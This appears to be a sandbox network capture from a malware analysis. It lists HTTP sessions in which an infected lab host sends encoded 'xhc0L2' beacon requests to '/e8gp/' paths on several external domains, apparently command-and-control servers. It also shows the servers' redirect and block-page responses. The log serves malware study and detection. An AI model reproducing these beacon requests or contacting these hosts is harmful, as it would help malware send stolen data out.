22 30 20 30 20 31 32 38 30 20 31 30 32 34 22 3e 0a 09 09 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 20 20 20 20 3c 67 20 63 6c 61 73 73 3d 22 68 69 64 65 20 74 72 69 2d 64 6f 74 73 22 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 30 36 2e 31 22 20 63 79 3d 22 38 39 30 2e 37 22 20 72 3d 22 33 2e 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 36 31 2e 33 20 32 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 36 2e 32 22 20 63 79 3d 22 38 37 38 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 35 33 2e 37 20 32 39 30 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 32 34 2e 34 22 20 63 79 3d 22 38 36 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 31 20 32 38 38 2e 31 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 34 35 2e 38 22 20 63 79 3d 22 38 36 37 2e 37 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 36 2e 35 20 32 39 38 2e 35 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css"><link rel='stylesheet' href='https://fonts.googleapis.com/css?family=Roboto+Condensed:400,700'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="container"> <p class="textA">Page Not Found</p> <p class="textB">404</p> <a class="textC" href="#">Go Back</a><svg class="page-not-found" viewBox="0 0 1280 1024"> <title>Page Not Found</title> <g class="hide tri-dots"> <circle cx="406.1" cy="890.7" r="3.5" transform="translate(-361.3 283) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="426.2" cy="878.8" r="3.7" transform="translate(-353.7 290.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="424.4" cy="861.8" r="3.7" transform="translate(-346.1 288.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="445.8" cy="867.7" r="3.7" transform="translate(-346.5 298.5) rotate(-27.1)" style="fill: #ffe
Aug 23, 2023 14:55:37.402901888 CEST	165	IN	Data Raw: 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 33 38 2e 33 22 20 63 79 3d 22 38 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 34 30 2e 31 20 Data Ascii: 029"/> <circle cx="438.3" cy="851.8" r="3.7" transform="translate(-340.1 293.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="453.8" cy="845.8" r="3.7" transform="translate(-335.6 299.8) rotate(-27.1)" style="fill: #ffe0
Aug 23, 2023 14:55:37.402920961 CEST	166	IN	Data Raw: 28 2d 33 32 30 2e 39 20 33 30 34 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 38 37 2e 39 22 20 Data Ascii: (-320.9 304.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="487.9" cy="810.2" r="3.7" transform="translate(-315.6 311.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="489.8" cy="791.1" r="3.7" transform="translate(
Aug 23, 2023 14:55:37.402942896 CEST	168	IN	Data Raw: 30 34 2e 36 22 20 63 79 3d 22 38 30 32 2e 33 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 33 31 30 2e 32 20 33 31 38 2e 32 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 Data Ascii: 04.6" cy="802.3" r="3.7" transform="translate(-310.2 318.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="519.7" cy="812.9" r="3.7" transform="translate(-313.4 326.2) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="53
Aug 23, 2023 14:55:37.403283119 CEST	169	IN	Data Raw: 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 32 2e 35 22 20 63 79 3d 22 37 39 30 2e 35 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e Data Ascii: 27.1)" style="fill: #ffe029"/> <circle cx="572.5" cy="790.5" r="3.7" transform="translate(-297.3 347.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="589.7" cy="797.2" r="3.7" transform="translate(-298.5 356.4) rotate(-2
Aug 23, 2023 14:55:37.403304100 CEST	170	IN	Data Raw: 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 36 33 2e 34 20 33 38 33 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 Data Ascii: .7" transform="translate(-263.4 383) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="648" cy="747.5" r="3.7" transform="translate(-269.4 377.5) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="643.5" cy="727.1" r="3.7" t
Aug 23, 2023 14:55:37.403359890 CEST	172	IN	Data Raw: 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 39 37 2e 39 22 20 63 79 3d 22 37 35 31 2e 38 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 37 36 2e 39 Data Ascii: e029"/> <circle cx="597.9" cy="751.8" r="3.7" transform="translate(-276.9 355.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="594.7" cy="767.9" r="3.7" transform="translate(-284.6 355.4) rotate(-27.1)" style="fill: #ffe
Aug 23, 2023 14:55:37.403378010 CEST	173	IN	Data Raw: 73 6c 61 74 65 28 2d 32 35 35 2e 31 20 33 33 38 2e 34 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 37 Data Ascii: slate(-255.1 338.4) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="574.8" cy="681.2" r="3.7" transform="translate(-247.3 336.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="559.1" cy="669.7" r="3.7" transform="trans
Aug 23, 2023 14:55:37.403395891 CEST	174	IN	Data Raw: 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 34 31 2e 31 22 20 63 79 3d 22 36 39 32 2e 39 22 20 72 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 35 36 2e 34 20 33 32 32 2e 38 29 20 72 6f 74 61 74 65 28 2d 32 Data Ascii: <circle cx="541.1" cy="692.9" r="3.7" transform="translate(-256.4 322.8) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="556.3" cy="703.9" r="3.7" transform="translate(-259.7 330.9) rotate(-27.1)" style="fill: #ffe029"/> <
Aug 23, 2023 14:55:37.403414965 CEST	176	IN	Data Raw: 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 09 09 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 63 78 3d 22 35 31 35 2e 32 22 20 63 79 3d 22 37 33 30 2e 35 22 20 72 3d 22 33 2e 37 22 Data Ascii: ate(-27.1)" style="fill: #ffe029"/> <circle cx="515.2" cy="730.5" r="3.7" transform="translate(-276.3 315.1) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="501" cy="717.2" r="3.7" transform="translate(-271.8 307.1) rotate
Aug 23, 2023 14:55:37.572000027 CEST	177	IN	Data Raw: 3d 22 33 2e 37 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 33 35 2e 31 20 33 30 32 2e 37 29 20 72 6f 74 61 74 65 28 2d 32 37 2e 31 29 22 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 20 23 66 66 65 30 32 39 22 2f 3e 0a 09 Data Ascii: ="3.7" transform="translate(-235.1 302.7) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="494.3" cy="646.3" r="3.7" transform="translate(-240.2 296.3) rotate(-27.1)" style="fill: #ffe029"/> <circle cx="478.7" cy="654.5" r=

Session ID	Source IP	Source Port	Destination IP	Destination Port
16	192.168.0.56	49181	137.220.225.54	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:55:48.630136013 CEST	204	OUT	POST /e8gp/ HTTP/1.1 Host: www.qq9122.com Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.qq9122.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.qq9122.com/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 4c 34 75 44 76 73 74 46 71 31 56 6b 43 34 79 2d 45 38 65 57 45 6c 6e 4d 56 67 4e 38 41 69 35 54 6f 4e 6e 7a 61 74 4c 49 50 49 61 67 79 53 38 66 37 72 42 36 4f 34 47 56 76 4a 67 33 30 6b 62 65 55 31 42 5a 6f 2d 76 74 6a 51 45 64 4a 51 73 46 6f 4f 63 30 58 44 71 30 4b 4e 38 4b 72 4c 32 4d 70 5a 49 52 72 50 28 32 66 51 4a 6a 4d 77 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=L4uDvstFq1VkC4y-E8eWElnMVgN8Ai5ToNnzatLIPIagyS8f7rB6O4GVvJg30kbeU1BZo-vtjQEdJQsFoOc0XDq0KN8KrL2MpZIRrP(2fQJjMw).
Aug 23, 2023 14:55:49.085002899 CEST	205	IN	HTTP/1.1 301 Moved Permanently Location: https://www.qq9122.com/e8gp/ Date: Wed, 23 Aug 2023 12:55:48 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.0.56	49182	137.220.225.54	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:55:48.955698013 CEST	204	OUT	GET /e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvDx&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.qq9122.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:55:49.280524969 CEST	205	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=utf-8 Location: https://www.qq9122.com/e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvDx&HDp=njTTUjRhh2_ Date: Wed, 23 Aug 2023 12:55:49 GMT Content-Length: 191 Connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 71 71 39 31 32 32 2e 63 6f 6d 2f 65 38 67 70 2f 3f 78 68 63 30 4c 32 3d 47 36 47 6a 73 61 4e 44 74 56 35 6d 61 72 61 45 43 4d 53 58 55 6e 33 46 53 43 74 52 4b 56 31 59 70 34 47 58 4d 65 4c 78 42 64 53 36 38 58 46 4d 38 66 46 75 43 6f 61 56 6d 4b 4d 63 30 45 54 39 43 48 56 56 2f 4f 50 50 6b 48 74 33 4a 77 39 73 38 76 70 4a 41 53 71 71 4e 65 41 4d 71 74 50 77 76 76 44 78 26 61 6d 70 3b 48 44 70 3d 6e 6a 54 54 55 6a 52 68 68 32 5f 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.qq9122.com/e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvDx&HDp=njTTUjRhh2_">Moved Permanently</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.0.56	49183	192.0.78.25	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:56:13.008902073 CEST	207	OUT	POST /e8gp/ HTTP/1.1 Host: www.dalilamendezgallery.com Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.dalilamendezgallery.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.dalilamendezgallery.com/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 32 71 4a 53 37 46 31 47 37 51 71 6e 4b 34 46 33 75 42 34 6d 46 4b 44 53 78 71 32 6b 54 41 56 69 41 7a 6c 37 45 33 73 4b 49 48 39 47 59 79 6e 59 38 2d 67 31 63 54 52 74 47 34 62 76 42 46 6f 46 74 37 6a 65 62 59 63 38 39 4b 7e 36 6e 4c 79 68 6f 38 7e 42 48 4f 39 35 30 42 73 43 42 56 56 31 78 33 50 71 4e 65 73 76 47 54 69 70 59 67 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=2qJS7F1G7QqnK4F3uB4mFKDSxq2kTAViAzl7E3sKIH9GYynY8-g1cTRtG4bvBFoFt7jebYc89K~6nLyho8~BHO950BsCBVV1x3PqNesvGTipYg).
Aug 23, 2023 14:56:13.017258883 CEST	208	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 23 Aug 2023 12:56:13 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.dalilamendezgallery.com/e8gp/ X-ac: 2.hhn _dfw BYPASS Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.0.56	49184	192.0.78.25	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:56:13.017651081 CEST	208	OUT	GET /e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BFp&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.dalilamendezgallery.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:56:13.026005030 CEST	209	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 23 Aug 2023 12:56:13 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.dalilamendezgallery.com/e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BFp&HDp=njTTUjRhh2_ X-ac: 2.hhn _dfw BYPASS Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.0.56	49167	192.0.78.25	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:52:59.880393982 CEST	134	OUT	GET /e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BGl&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.dalilamendezgallery.com Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:53:00.032476902 CEST	134	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 23 Aug 2023 12:53:00 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.dalilamendezgallery.com/e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BGl&HDp=njTTUjRhh2_ X-ac: 2.hhn _dfw BYPASS Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.0.56	49185	188.114.96.3	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:56:23.041021109 CEST	210	OUT	POST /e8gp/ HTTP/1.1 Host: www.spv88.online Connection: close Content-Length: 120 Cache-Control: no-cache Origin: http://www.spv88.online User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.spv88.online/e8gp/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 78 68 63 30 4c 32 3d 33 63 70 4b 30 78 51 54 36 44 54 37 79 6f 69 48 54 68 49 33 41 4c 6e 4d 69 48 59 48 79 69 53 5f 70 63 35 79 6a 45 56 57 4b 37 52 64 6b 4d 53 56 64 48 4f 69 65 57 43 32 78 53 4f 76 4c 34 64 4b 64 7a 71 36 61 78 57 70 4c 62 65 41 64 71 38 6e 36 43 46 52 50 77 79 75 41 4b 6c 4b 7e 38 44 41 4c 6d 48 4a 4b 30 4f 71 73 69 4b 52 35 67 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=3cpK0xQT6DT7yoiHThI3ALnMiHYHyiS_pc5yjEVWK7RdkMSVdHOieWC2xSOvL4dKdzq6axWpLbeAdq8n6CFRPwyuAKlK~8DALmHJK0OqsiKR5g).

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.0.56	49186	188.114.96.3	80

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2023 14:56:23.049901009 CEST	210	OUT	GET /e8gp/?xhc0L2=6eBq3For9zap+5OTHjEdFb+cgnEpiUG6j5oni2dGM+5uq+KZcTGOclOU9yeLFqZHdTK7cjefMM3qdKtOujwsYhywHZZM/a68NQPS&HDp=njTTUjRhh2_ HTTP/1.1 Host: www.spv88.online Connection: close Data Raw: 00 00 00 00 00 00 Data Ascii:
Aug 23, 2023 14:56:23.074120045 CEST	212	IN	HTTP/1.1 403 Forbidden Date: Wed, 23 Aug 2023 12:56:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: max-age=15 Expires: Wed, 23 Aug 2023 12:56:38 GMT X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=H5wCGlafP7oKiXclCcCQ1Uo%2B4MRlMjAlBqW8k2O5FbUFTMW36tUu1HRXrS40%2FUT%2F6azXMGKNKbbdUfZVTqGEXd4GZ%2BuH5Rn0OpEUKd8z7v6SWf6O0VRRLiGNCpT%2FVvTaWCRr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 7fb383e81d5e30ee-FRA alt-svc: h3=":443"; ma=86400 Data Raw: 31 31 61 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 Data Ascii: 11a4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name
Aug 23, 2023 14:56:23.074151993 CEST	213	IN	Data Raw: 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 Data Ascii: ="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css"
Aug 23, 2023 14:56:23.074172020 CEST	215	IN	Data Raw: 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 Data Ascii: <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-colu
Aug 23, 2023 14:56:23.074189901 CEST	216	IN	Data Raw: 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e Data Ascii: ray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7fb383e81d5e30ee</strong></span> <span class="cf-footer-separator sm:hidden">•</span> <span id="cf-
